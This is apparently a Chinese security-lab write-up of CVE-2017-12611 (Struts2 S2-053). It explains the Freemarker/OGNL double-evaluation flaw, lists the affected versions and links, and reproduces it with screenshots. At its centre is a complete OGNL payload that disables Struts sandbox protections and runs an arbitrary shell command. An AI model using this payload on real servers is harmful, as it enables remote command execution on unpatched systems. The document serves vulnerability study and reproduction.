CVE-2017-12611
漏洞描述:Struts2 在使用 Freemarker 模板引擎的时候,同时允许解析 OGNL 表达式。导致用户输入的数据本身不会被 OGNL 解析,但由于被 Freemarker 解析一次后变成离开一个表达式,被 OGNL 解析第二次,导致任意命令执行漏洞。
影响版本:Struts 2.0.1 – Struts 2.3.33, Struts 2.5 – Struts 2.5.10
参考资料:
- https://www.cnblogs.com/peace-and-romance/p/15652528.html
- https://www.wangan.com/docs/443
- https://blog.csdn.net/qq_35622443/article/details/122440645
POC:
- 输入POC时,最后一行要跟一个换行
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='ls -ll /tmp').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
漏洞复现
![图片[1]-【初级】S2-053远程命令执行-NGC660安全实验室](http://ngc660.cn/wp-content/uploads/2022/10/d2b5ca33bd090435-1024x250.png)
![图片[2]-【初级】S2-053远程命令执行-NGC660安全实验室](http://ngc660.cn/wp-content/uploads/2022/10/d2b5ca33bd090441-1024x230.png)
© 版权声明
部分文章采集于互联网,若侵权请联系删除!
THE END
请登录后查看评论内容